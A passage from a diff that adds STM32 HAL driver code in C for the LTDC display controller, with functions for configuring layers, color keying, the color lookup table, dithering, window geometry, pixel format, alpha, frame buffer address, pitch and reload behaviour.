layer. + (+) Configure the color keying. + (+) Configure the C-LUT. + (+) Enable / Disable the color keying. + (+) Enable / Disable the C-LUT. + (+) Update the layer position. + (+) Update the layer size. + (+) Update pixel format on the fly. + (+) Update transparency on the fly. + (+) Update address on the fly. + +@endverbatim + * @{ + */ + +/** + * @brief Configure the LTDC Layer according to the specified + * parameters in the LTDC_InitTypeDef and create the associated handle. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param pLayerCfg pointer to a LTDC_LayerCfgTypeDef structure that contains + * the configuration information for the Layer. + * @param LayerIdx LTDC Layer index. + * This parameter can be one of the following values: + * LTDC_LAYER_1 (0) or LTDC_LAYER_2 (1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_ConfigLayer(LTDC_HandleTypeDef *hltdc, LTDC_LayerCfgTypeDef *pLayerCfg, uint32_t LayerIdx) +{ + /* Check the parameters */ + assert_param(IS_LTDC_LAYER(LayerIdx)); + assert_param(IS_LTDC_HCONFIGST(pLayerCfg->WindowX0)); + assert_param(IS_LTDC_HCONFIGSP(pLayerCfg->WindowX1)); + assert_param(IS_LTDC_VCONFIGST(pLayerCfg->WindowY0)); + assert_param(IS_LTDC_VCONFIGSP(pLayerCfg->WindowY1)); + assert_param(IS_LTDC_PIXEL_FORMAT(pLayerCfg->PixelFormat)); + assert_param(IS_LTDC_ALPHA(pLayerCfg->Alpha)); + assert_param(IS_LTDC_ALPHA(pLayerCfg->Alpha0)); + assert_param(IS_LTDC_BLENDING_FACTOR1(pLayerCfg->BlendingFactor1)); + assert_param(IS_LTDC_BLENDING_FACTOR2(pLayerCfg->BlendingFactor2)); + assert_param(IS_LTDC_CFBLL(pLayerCfg->ImageWidth)); + assert_param(IS_LTDC_CFBLNBR(pLayerCfg->ImageHeight)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Copy new layer configuration into handle structure */ + hltdc->LayerCfg[LayerIdx] = *pLayerCfg; + + /* Configure the LTDC Layer */ + LTDC_SetConfig(hltdc, pLayerCfg, LayerIdx); + + /* Set the Immediate Reload type */ + hltdc->Instance->SRCR = LTDC_SRCR_IMR; + + /* Initialize the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Configure the color keying. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param RGBValue the color key value + * @param LayerIdx LTDC Layer index. + * This parameter can be one of the following values: + * LTDC_LAYER_1 (0) or LTDC_LAYER_2 (1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_ConfigColorKeying(LTDC_HandleTypeDef *hltdc, uint32_t RGBValue, uint32_t LayerIdx) +{ + /* Check the parameters */ + assert_param(IS_LTDC_LAYER(LayerIdx)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Configure the default color values */ + LTDC_LAYER(hltdc, LayerIdx)->CKCR &= ~(LTDC_LxCKCR_CKBLUE | LTDC_LxCKCR_CKGREEN | LTDC_LxCKCR_CKRED); + LTDC_LAYER(hltdc, LayerIdx)->CKCR = RGBValue; + + /* Set the Immediate Reload type */ + hltdc->Instance->SRCR = LTDC_SRCR_IMR; + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Load the color lookup table. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param pCLUT pointer to the color lookup table address. + * @param CLUTSize the color lookup table size. + * @param LayerIdx LTDC Layer index. + * This parameter can be one of the following values: + * LTDC_LAYER_1 (0) or LTDC_LAYER_2 (1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_ConfigCLUT(LTDC_HandleTypeDef *hltdc, uint32_t *pCLUT, uint32_t CLUTSize, uint32_t LayerIdx) +{ + uint32_t tmp; + uint32_t counter; + uint32_t *pcolorlut = pCLUT; + /* Check the parameters */ + assert_param(IS_LTDC_LAYER(LayerIdx)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + for (counter = 0U; (counter < CLUTSize); counter++) + { + if (hltdc->LayerCfg[LayerIdx].PixelFormat == LTDC_PIXEL_FORMAT_AL44) + { + tmp = (((counter + (16U*counter)) << 24U) | ((uint32_t)(*pcolorlut) & 0xFFU) | ((uint32_t)(*pcolorlut) & 0xFF00U) | ((uint32_t)(*pcolorlut) & 0xFF0000U)); + } + else + { + tmp = ((counter << 24U) | ((uint32_t)(*pcolorlut) & 0xFFU) | ((uint32_t)(*pcolorlut) & 0xFF00U) | ((uint32_t)(*pcolorlut) & 0xFF0000U)); + } + + pcolorlut++; + + /* Specifies the C-LUT address and RGB value */ + LTDC_LAYER(hltdc, LayerIdx)->CLUTWR = tmp; + } + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Enable the color keying. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param LayerIdx LTDC Layer index. + * This parameter can be one of the following values: + * LTDC_LAYER_1 (0) or LTDC_LAYER_2 (1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_EnableColorKeying(LTDC_HandleTypeDef *hltdc, uint32_t LayerIdx) +{ + /* Check the parameters */ + assert_param(IS_LTDC_LAYER(LayerIdx)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Enable LTDC color keying by setting COLKEN bit */ + LTDC_LAYER(hltdc, LayerIdx)->CR |= (uint32_t)LTDC_LxCR_COLKEN; + + /* Set the Immediate Reload type */ + hltdc->Instance->SRCR = LTDC_SRCR_IMR; + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Disable the color keying. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param LayerIdx LTDC Layer index. + * This parameter can be one of the following values: + * LTDC_LAYER_1 (0) or LTDC_LAYER_2 (1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_DisableColorKeying(LTDC_HandleTypeDef *hltdc, uint32_t LayerIdx) +{ + /* Check the parameters */ + assert_param(IS_LTDC_LAYER(LayerIdx)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Disable LTDC color keying by setting COLKEN bit */ + LTDC_LAYER(hltdc, LayerIdx)->CR &= ~(uint32_t)LTDC_LxCR_COLKEN; + + /* Set the Immediate Reload type */ + hltdc->Instance->SRCR = LTDC_SRCR_IMR; + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Enable the color lookup table. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param LayerIdx LTDC Layer index. + * This parameter can be one of the following values: + * LTDC_LAYER_1 (0) or LTDC_LAYER_2 (1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_EnableCLUT(LTDC_HandleTypeDef *hltdc, uint32_t LayerIdx) +{ + /* Check the parameters */ + assert_param(IS_LTDC_LAYER(LayerIdx)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Enable LTDC color lookup table by setting CLUTEN bit */ + LTDC_LAYER(hltdc, LayerIdx)->CR |= (uint32_t)LTDC_LxCR_CLUTEN; + + /* Set the Immediate Reload type */ + hltdc->Instance->SRCR = LTDC_SRCR_IMR; + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Disable the color lookup table. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param LayerIdx LTDC Layer index. + * This parameter can be one of the following values: + * LTDC_LAYER_1 (0) or LTDC_LAYER_2 (1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_DisableCLUT(LTDC_HandleTypeDef *hltdc, uint32_t LayerIdx) +{ + /* Check the parameters */ + assert_param(IS_LTDC_LAYER(LayerIdx)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Disable LTDC color lookup table by setting CLUTEN bit */ + LTDC_LAYER(hltdc, LayerIdx)->CR &= ~(uint32_t)LTDC_LxCR_CLUTEN; + + /* Set the Immediate Reload type */ + hltdc->Instance->SRCR = LTDC_SRCR_IMR; + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Enable Dither. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @retval HAL status + */ + +HAL_StatusTypeDef HAL_LTDC_EnableDither(LTDC_HandleTypeDef *hltdc) +{ + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Enable Dither by setting DTEN bit */ + LTDC->GCR |= (uint32_t)LTDC_GCR_DEN; + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Disable Dither. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @retval HAL status + */ + +HAL_StatusTypeDef HAL_LTDC_DisableDither(LTDC_HandleTypeDef *hltdc) +{ + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Disable Dither by setting DTEN bit */ + LTDC->GCR &= ~(uint32_t)LTDC_GCR_DEN; + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Set the LTDC window size. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param XSize LTDC Pixel per line + * @param YSize LTDC Line number + * @param LayerIdx LTDC Layer index. + * This parameter can be one of the following values: + * LTDC_LAYER_1 (0) or LTDC_LAYER_2 (1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_SetWindowSize(LTDC_HandleTypeDef *hltdc, uint32_t XSize, uint32_t YSize, uint32_t LayerIdx) +{ + LTDC_LayerCfgTypeDef *pLayerCfg; + + /* Check the parameters (Layers parameters)*/ + assert_param(IS_LTDC_LAYER(LayerIdx)); + assert_param(IS_LTDC_CFBLL(XSize)); + assert_param(IS_LTDC_CFBLNBR(YSize)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Get layer configuration from handle structure */ + pLayerCfg = &hltdc->LayerCfg[LayerIdx]; + + /* update horizontal stop */ + pLayerCfg->WindowX1 = XSize + pLayerCfg->WindowX0; + + /* update vertical stop */ + pLayerCfg->WindowY1 = YSize + pLayerCfg->WindowY0; + + /* Reconfigures the color frame buffer pitch in byte */ + pLayerCfg->ImageWidth = XSize; + + /* Reconfigures the frame buffer line number */ + pLayerCfg->ImageHeight = YSize; + + /* Set LTDC parameters */ + LTDC_SetConfig(hltdc, pLayerCfg, LayerIdx); + + /* Set the Immediate Reload type */ + hltdc->Instance->SRCR = LTDC_SRCR_IMR; + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Set the LTDC window position. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param X0 LTDC window X offset + * @param Y0 LTDC window Y offset + * @param LayerIdx LTDC Layer index. + * This parameter can be one of the following values: + * LTDC_LAYER_1 (0) or LTDC_LAYER_2 (1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_SetWindowPosition(LTDC_HandleTypeDef *hltdc, uint32_t X0, uint32_t Y0, uint32_t LayerIdx) +{ + LTDC_LayerCfgTypeDef *pLayerCfg; + + /* Check the parameters */ + assert_param(IS_LTDC_LAYER(LayerIdx)); + assert_param(IS_LTDC_CFBLL(X0)); + assert_param(IS_LTDC_CFBLNBR(Y0)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Get layer configuration from handle structure */ + pLayerCfg = &hltdc->LayerCfg[LayerIdx]; + + /* update horizontal start/stop */ + pLayerCfg->WindowX0 = X0; + pLayerCfg->WindowX1 = X0 + pLayerCfg->ImageWidth; + + /* update vertical start/stop */ + pLayerCfg->WindowY0 = Y0; + pLayerCfg->WindowY1 = Y0 + pLayerCfg->ImageHeight; + + /* Set LTDC parameters */ + LTDC_SetConfig(hltdc, pLayerCfg, LayerIdx); + + /* Set the Immediate Reload type */ + hltdc->Instance->SRCR = LTDC_SRCR_IMR; + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Reconfigure the pixel format. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param Pixelformat new pixel format value. + * @param LayerIdx LTDC Layer index. + * This parameter can be one of the following values: + * LTDC_LAYER_1 (0) or LTDC_LAYER_2 (1). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_SetPixelFormat(LTDC_HandleTypeDef *hltdc, uint32_t Pixelformat, uint32_t LayerIdx) +{ + LTDC_LayerCfgTypeDef *pLayerCfg; + + /* Check the parameters */ + assert_param(IS_LTDC_PIXEL_FORMAT(Pixelformat)); + assert_param(IS_LTDC_LAYER(LayerIdx)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Get layer configuration from handle structure */ + pLayerCfg = &hltdc->LayerCfg[LayerIdx]; + + /* Reconfigure the pixel format */ + pLayerCfg->PixelFormat = Pixelformat; + + /* Set LTDC parameters */ + LTDC_SetConfig(hltdc, pLayerCfg, LayerIdx); + + /* Set the Immediate Reload type */ + hltdc->Instance->SRCR = LTDC_SRCR_IMR; + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Reconfigure the layer alpha value. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param Alpha new alpha value. + * @param LayerIdx LTDC Layer index. + * This parameter can be one of the following values: + * LTDC_LAYER_1 (0) or LTDC_LAYER_2 (1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_SetAlpha(LTDC_HandleTypeDef *hltdc, uint32_t Alpha, uint32_t LayerIdx) +{ + LTDC_LayerCfgTypeDef *pLayerCfg; + + /* Check the parameters */ + assert_param(IS_LTDC_ALPHA(Alpha)); + assert_param(IS_LTDC_LAYER(LayerIdx)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Get layer configuration from handle structure */ + pLayerCfg = &hltdc->LayerCfg[LayerIdx]; + + /* Reconfigure the Alpha value */ + pLayerCfg->Alpha = Alpha; + + /* Set LTDC parameters */ + LTDC_SetConfig(hltdc, pLayerCfg, LayerIdx); + + /* Set the Immediate Reload type */ + hltdc->Instance->SRCR = LTDC_SRCR_IMR; + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} +/** + * @brief Reconfigure the frame buffer Address. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param Address new address value. + * @param LayerIdx LTDC Layer index. + * This parameter can be one of the following values: + * LTDC_LAYER_1 (0) or LTDC_LAYER_2 (1). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_SetAddress(LTDC_HandleTypeDef *hltdc, uint32_t Address, uint32_t LayerIdx) +{ + LTDC_LayerCfgTypeDef *pLayerCfg; + + /* Check the parameters */ + assert_param(IS_LTDC_LAYER(LayerIdx)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Get layer configuration from handle structure */ + pLayerCfg = &hltdc->LayerCfg[LayerIdx]; + + /* Reconfigure the Address */ + pLayerCfg->FBStartAdress = Address; + + /* Set LTDC parameters */ + LTDC_SetConfig(hltdc, pLayerCfg, LayerIdx); + + /* Set the Immediate Reload type */ + hltdc->Instance->SRCR = LTDC_SRCR_IMR; + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Function used to reconfigure the pitch for specific cases where the attached LayerIdx buffer have a width that is + * larger than the one intended to be displayed on screen. Example of a buffer 800x480 attached to layer for which we + * want to read and display on screen only a portion 320x240 taken in the center of the buffer. The pitch in pixels + * will be in that case 800 pixels and not 320 pixels as initially configured by previous call to HAL_LTDC_ConfigLayer(). + * @note This function should be called only after a previous call to HAL_LTDC_ConfigLayer() to modify the default pitch + * configured by HAL_LTDC_ConfigLayer() when required (refer to example described just above). + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param LinePitchInPixels New line pitch in pixels to configure for LTDC layer 'LayerIdx'. + * @param LayerIdx LTDC layer index concerned by the modification of line pitch. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_SetPitch(LTDC_HandleTypeDef *hltdc, uint32_t LinePitchInPixels, uint32_t LayerIdx) +{ + uint32_t tmp; + uint32_t pitchUpdate; + uint32_t pixelFormat; + + /* Check the parameters */ + assert_param(IS_LTDC_LAYER(LayerIdx)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* get LayerIdx used pixel format */ + pixelFormat = hltdc->LayerCfg[LayerIdx].PixelFormat; + + if (pixelFormat == LTDC_PIXEL_FORMAT_ARGB8888) + { + tmp = 4U; + } + else if (pixelFormat == LTDC_PIXEL_FORMAT_RGB888) + { + tmp = 3U; + } + else if ((pixelFormat == LTDC_PIXEL_FORMAT_ARGB4444) || \ + (pixelFormat == LTDC_PIXEL_FORMAT_RGB565) || \ + (pixelFormat == LTDC_PIXEL_FORMAT_ARGB1555) || \ + (pixelFormat == LTDC_PIXEL_FORMAT_AL88)) + { + tmp = 2U; + } + else + { + tmp = 1U; + } + + pitchUpdate = ((LinePitchInPixels * tmp) << 16U); + + /* Clear previously set standard pitch */ + LTDC_LAYER(hltdc, LayerIdx)->CFBLR &= ~LTDC_LxCFBLR_CFBP; + + /* Set the Reload type as immediate update of LTDC pitch configured above */ + LTDC->SRCR |= LTDC_SRCR_IMR; + + /* Set new line pitch value */ + LTDC_LAYER(hltdc, LayerIdx)->CFBLR |= pitchUpdate; + + /* Set the Reload type as immediate update of LTDC pitch configured above */ + LTDC->SRCR |= LTDC_SRCR_IMR; + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Define the position of the line interrupt. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param Line Line Interrupt Position. + * @note User application may resort to HAL_LTDC_LineEventCallback() at line interrupt generation. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_ProgramLineEvent(LTDC_HandleTypeDef *hltdc, uint32_t Line) +{ + /* Check the parameters */ + assert_param(IS_LTDC_LIPOS(Line)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Disable the Line interrupt */ + __HAL_LTDC_DISABLE_IT(hltdc, LTDC_IT_LI); + + /* Set the Line Interrupt position */ + LTDC->LIPCR = (uint32_t)Line; + + /* Enable the Line interrupt */ + __HAL_LTDC_ENABLE_IT(hltdc, LTDC_IT_LI); + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Reload LTDC Layers configuration. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param ReloadType This parameter can be one of the following values : + * LTDC_RELOAD_IMMEDIATE : Immediate Reload + * LTDC_RELOAD_VERTICAL_BLANKING : Reload in the next Vertical Blanking + * @note User application may resort to HAL_LTDC_ReloadEventCallback() at reload interrupt generation. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_Reload(LTDC_HandleTypeDef *hltdc, uint32_t ReloadType) +{ + /* Check the parameters */ + assert_param(IS_LTDC_RELOAD(ReloadType)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Enable the Reload interrupt */ + __HAL_LTDC_ENABLE_IT(hltdc, LTDC_IT_RR); + + /* Apply Reload type */ + hltdc->Instance->SRCR = ReloadType; + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Configure the LTDC Layer according to the specified without reloading + * parameters in the LTDC_InitTypeDef and create the associated handle. + * Variant of the function HAL_LTDC_ConfigLayer without immediate reload. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param pLayerCfg pointer to a LTDC_LayerCfgTypeDef structure that contains + * the configuration information for the Layer. + * @param LayerIdx LTDC Layer index. + * This parameter can be one of the following values: + * LTDC_LAYER_1 (0) or LTDC_LAYER_2 (1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_ConfigLayer_NoReload(LTDC_HandleTypeDef *hltdc, LTDC_LayerCfgTypeDef *pLayerCfg, uint32_t LayerIdx) +{ + /* Check the parameters */ + assert_param(IS_LTDC_LAYER(LayerIdx)); + assert_param(IS_LTDC_HCONFIGST(pLayerCfg->WindowX0)); + assert_param(IS_LTDC_HCONFIGSP(pLayerCfg->WindowX1)); + assert_param(IS_LTDC_VCONFIGST(pLayerCfg->WindowY0)); + assert_param(IS_LTDC_VCONFIGSP(pLayerCfg->WindowY1)); + assert_param(IS_LTDC_PIXEL_FORMAT(pLayerCfg->PixelFormat)); + assert_param(IS_LTDC_ALPHA(pLayerCfg->Alpha)); + assert_param(IS_LTDC_ALPHA(pLayerCfg->Alpha0)); + assert_param(IS_LTDC_BLENDING_FACTOR1(pLayerCfg->BlendingFactor1)); + assert_param(IS_LTDC_BLENDING_FACTOR2(pLayerCfg->BlendingFactor2)); + assert_param(IS_LTDC_CFBLL(pLayerCfg->ImageWidth)); + assert_param(IS_LTDC_CFBLNBR(pLayerCfg->ImageHeight)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Copy new layer configuration into handle structure */ + hltdc->LayerCfg[LayerIdx] = *pLayerCfg; + + /* Configure the LTDC Layer */ + LTDC_SetConfig(hltdc, pLayerCfg, LayerIdx); + + /* Initialize the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Set the LTDC window size without reloading. + * Variant of the function HAL_LTDC_SetWindowSize without immediate reload. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param XSize LTDC Pixel per line + * @param YSize LTDC Line number + * @param LayerIdx LTDC Layer index. + * This parameter can be one of the following values: + * LTDC_LAYER_1 (0) or LTDC_LAYER_2 (1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_SetWindowSize_NoReload(LTDC_HandleTypeDef *hltdc, uint32_t XSize, uint32_t YSize, uint32_t LayerIdx) +{ + LTDC_LayerCfgTypeDef *pLayerCfg; + + /* Check the parameters (Layers parameters)*/ + assert_param(IS_LTDC_LAYER(LayerIdx)); + assert_param(IS_LTDC_CFBLL(XSize)); + assert_param(IS_LTDC_CFBLNBR(YSize)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Get layer configuration from handle structure */ + pLayerCfg = &hltdc->LayerCfg[LayerIdx]; + + /* update horizontal stop */ + pLayerCfg->WindowX1 = XSize + pLayerCfg->WindowX0; + + /* update vertical stop */ + pLayerCfg->WindowY1 = YSize + pLayerCfg->WindowY0; + + /* Reconfigures the color frame buffer pitch in byte */ + pLayerCfg->ImageWidth = XSize; + + /* Reconfigures the frame buffer line number */ + pLayerCfg->ImageHeight = YSize; + + /* Set LTDC parameters */ + LTDC_SetConfig(hltdc, pLayerCfg, LayerIdx); + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Set the LTDC window position without reloading. + * Variant of the function HAL_LTDC_SetWindowPosition without immediate reload. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param X0 LTDC window X offset + * @param Y0 LTDC window Y offset + * @param LayerIdx LTDC Layer index. + * This parameter can be one of the following values: + * LTDC_LAYER_1 (0) or LTDC_LAYER_2 (1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_SetWindowPosition_NoReload(LTDC_HandleTypeDef *hltdc, uint32_t X0, uint32_t Y0, uint32_t LayerIdx) +{ + LTDC_LayerCfgTypeDef *pLayerCfg; + + /* Check the parameters */ + assert_param(IS_LTDC_LAYER(LayerIdx)); + assert_param(IS_LTDC_CFBLL(X0)); + assert_param(IS_LTDC_CFBLNBR(Y0)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Get layer configuration from handle structure */ + pLayerCfg = &hltdc->LayerCfg[LayerIdx]; + + /* update horizontal start/stop */ + pLayerCfg->WindowX0 = X0; + pLayerCfg->WindowX1 = X0 + pLayerCfg->ImageWidth; + + /* update vertical start/stop */ + pLayerCfg->WindowY0 = Y0; + pLayerCfg->WindowY1 = Y0 + pLayerCfg->ImageHeight; + + /* Set LTDC parameters */ + LTDC_SetConfig(hltdc, pLayerCfg, LayerIdx); + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Reconfigure the pixel format without reloading. + * Variant of the function HAL_LTDC_SetPixelFormat without immediate reload. + * @param hltdc pointer to a LTDC_HandleTypeDfef structure that contains + * the configuration information for the LTDC. + * @param Pixelformat new pixel format value. + * @param LayerIdx LTDC Layer index. + * This parameter can be one of the following values: + * LTDC_LAYER_1 (0) or LTDC_LAYER_2 (1). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_SetPixelFormat_NoReload(LTDC_HandleTypeDef *hltdc, uint32_t Pixelformat, uint32_t LayerIdx) +{ + LTDC_LayerCfgTypeDef *pLayerCfg; + + /* Check the parameters */ + assert_param(IS_LTDC_PIXEL_FORMAT(Pixelformat)); + assert_param(IS_LTDC_LAYER(LayerIdx)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Get layer configuration from handle structure */ + pLayerCfg = &hltdc->LayerCfg[LayerIdx]; + + /* Reconfigure the pixel format */ + pLayerCfg->PixelFormat = Pixelformat; + + /* Set LTDC parameters */ + LTDC_SetConfig(hltdc, pLayerCfg, LayerIdx); + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Reconfigure the layer alpha value without reloading. + * Variant of the function HAL_LTDC_SetAlpha without immediate reload. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param Alpha new alpha value. + * @param LayerIdx LTDC Layer index. + * This parameter can be one of the following values: + * LTDC_LAYER_1 (0) or LTDC_LAYER_2 (1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_SetAlpha_NoReload(LTDC_HandleTypeDef *hltdc, uint32_t Alpha, uint32_t LayerIdx) +{ + LTDC_LayerCfgTypeDef *pLayerCfg; + + /* Check the parameters */ + 